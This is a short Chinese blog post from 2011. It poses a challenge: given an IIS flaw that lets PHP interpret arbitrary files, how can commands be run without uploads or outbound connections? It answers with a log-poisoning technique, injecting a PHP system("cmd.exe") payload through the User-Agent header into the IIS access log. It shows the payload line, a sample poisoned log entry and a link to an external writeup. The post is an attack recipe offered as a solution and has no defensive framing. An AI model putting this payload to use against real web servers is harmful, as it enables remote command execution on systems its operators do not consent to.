已知一个iis漏洞可以让php解释任意的给定文件

已知一个iis漏洞可以让php解释任意的给定文件。

挑战:

怎么执行任意命令?

应用环境:防火墙配置不准许对外连接。

要求:不能要求上传文件。


总算看到一次答案了:

http://www.inbreak.net/kxlzxtest/phpiis.txt

C:\Windows\System32\LogFiles\w3svcXXXX让php解析当天访问日志,然后用get请求提交user agent为 User-Agent: <?php system("cmd.exe");?>

于是当天日志加入了 2011-01-01 16:25:06 W3SVC1 10.247.186.114 GET /index.asp - 80 - xxxxxxxxxxxxxxxxxx <?php+system("cmd.exe");+?> 200 0 0 然后用漏洞加载这个文件即可

posted @ 2011-04-27 16:29  WHaa_(T_T)  阅读(348)  评论(0编辑  收藏  举报